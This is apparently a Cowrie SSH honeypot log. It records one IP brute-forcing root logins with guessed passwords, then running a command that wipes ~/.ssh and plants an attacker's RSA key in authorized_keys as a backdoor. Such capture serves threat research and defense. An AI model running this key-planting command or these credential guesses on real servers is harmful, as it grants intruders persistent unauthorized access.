{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:02:07.202252Z","src_ip":"212.227.235.229","session":"602fc0237f6f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:07.203302Z","src_ip":"212.227.235.229","session":"602fc0237f6f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:07.340038Z","src_ip":"212.227.235.229","session":"638434ab2bd4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57032,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6f2f490be8f","protocol":"ssh","message":"New connection: 212.227.235.229:57032 (1.2.3.4:22) [session: f6f2f490be8f]","sensor":"my-vps","timestamp":"2025-09-08T22:02:07.389520Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:07.390254Z","src_ip":"212.227.235.229","session":"f6f2f490be8f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:07.568315Z","src_ip":"212.227.235.229","session":"f6f2f490be8f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:02:08.321461Z","src_ip":"212.227.235.229","session":"f6f2f490be8f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:02:08.563707Z","src_ip":"212.227.235.229","session":"638434ab2bd4"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:08.871341Z","src_ip":"212.227.235.229","session":"358798ad64e8"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:08.873003Z","src_ip":"212.227.235.229","session":"638434ab2bd4"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:09.501144Z","src_ip":"212.227.235.229","session":"f6f2f490be8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57042,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5333dcaf905","protocol":"ssh","message":"New connection: 212.227.235.229:57042 (1.2.3.4:22) [session: d5333dcaf905]","sensor":"my-vps","timestamp":"2025-09-08T22:02:09.664067Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:09.664962Z","src_ip":"212.227.235.229","session":"d5333dcaf905"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:09.838563Z","src_ip":"212.227.235.229","session":"d5333dcaf905"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:02:10.575896Z","src_ip":"212.227.235.229","session":"d5333dcaf905"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:10.751327Z","src_ip":"212.227.235.229","session":"602fc0237f6f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:10.752461Z","src_ip":"212.227.235.229","session":"d5333dcaf905"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38884,"dst_ip":"1.2.3.4","dst_port":22,"session":"240705f9a856","protocol":"ssh","message":"New connection: 212.227.235.229:38884 (1.2.3.4:22) [session: 240705f9a856]","sensor":"my-vps","timestamp":"2025-09-08T22:02:24.488347Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:24.489660Z","src_ip":"212.227.235.229","session":"240705f9a856"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:24.782043Z","src_ip":"212.227.235.229","session":"240705f9a856"}
{"eventid":"cowrie.login.success","username":"root","password":"root123456*","message":"login attempt [root/root123456*] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:02:25.991548Z","src_ip":"212.227.235.229","session":"240705f9a856"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:02:26.600110Z","src_ip":"212.227.235.229","session":"240705f9a856"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:02:26.600921Z","src_ip":"212.227.235.229","session":"240705f9a856"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:02:26.602194Z","src_ip":"212.227.235.229","session":"240705f9a856"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:26.902027Z","src_ip":"212.227.235.229","session":"240705f9a856"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:02:27.620607Z","src_ip":"212.227.235.229","session":"240705f9a856"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:02:27.621544Z","src_ip":"212.227.235.229","session":"240705f9a856"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:02:27.917051Z","src_ip":"212.227.235.229","session":"240705f9a856"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:27.918075Z","src_ip":"212.227.235.229","session":"240705f9a856"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56060,"dst_ip":"1.2.3.4","dst_port":22,"session":"a145fc9430e6","protocol":"ssh","message":"New connection: 212.227.235.229:56060 (1.2.3.4:22) [session: a145fc9430e6]","sensor":"my-vps","timestamp":"2025-09-08T22:02:28.209409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:28.210404Z","src_ip":"212.227.235.229","session":"a145fc9430e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36810,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e1b3cc0588a","protocol":"ssh","message":"New connection: 212.227.235.229:36810 (1.2.3.4:22) [session: 6e1b3cc0588a]","sensor":"my-vps","timestamp":"2025-09-08T22:02:28.290009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:28.290886Z","src_ip":"212.227.235.229","session":"6e1b3cc0588a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:28.503019Z","src_ip":"212.227.235.229","session":"a145fc9430e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34676,"dst_ip":"1.2.3.4","dst_port":22,"session":"0304151a3a80","protocol":"ssh","message":"New connection: 212.227.235.229:34676 (1.2.3.4:22) [session: 0304151a3a80]","sensor":"my-vps","timestamp":"2025-09-08T22:02:28.882768Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:28.883907Z","src_ip":"212.227.235.229","session":"0304151a3a80"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:29.198362Z","src_ip":"212.227.235.229","session":"0304151a3a80"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:02:29.716032Z","src_ip":"212.227.235.229","session":"a145fc9430e6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:30.010643Z","src_ip":"212.227.235.229","session":"6e1b3cc0588a"}
{"eventid":"cowrie.login.success","username":"root","password":"Cc123456789","message":"login attempt [root/Cc123456789] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:02:30.497998Z","src_ip":"212.227.235.229","session":"0304151a3a80"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:31.011058Z","src_ip":"212.227.235.229","session":"a145fc9430e6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:02:31.187074Z","src_ip":"212.227.235.229","session":"0304151a3a80"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:02:31.187824Z","src_ip":"212.227.235.229","session":"0304151a3a80"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:02:31.188594Z","src_ip":"212.227.235.229","session":"0304151a3a80"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56062,"dst_ip":"1.2.3.4","dst_port":22,"session":"2517baab673c","protocol":"ssh","message":"New connection: 212.227.235.229:56062 (1.2.3.4:22) [session: 2517baab673c]","sensor":"my-vps","timestamp":"2025-09-08T22:02:31.306224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:02:31.307245Z","src_ip":"212.227.235.229","session":"2517baab673c"}
{"eventid":"cowrie.login.failed","username":"centos","password":"12345","message":"login attempt [centos/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T22:02:31.355179Z","src_ip":"212.227.235.229","session":"6e1b3cc0588a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:02:31.504054Z","src_ip":"212.227.235.229","session":"0304151a3a80"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:02:31.601704Z","src_ip":"212.227.235.229","session":"2517baab673c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:02:32.152875Z","src_ip":"212.227.235.229","session":"0304151a3a80"}
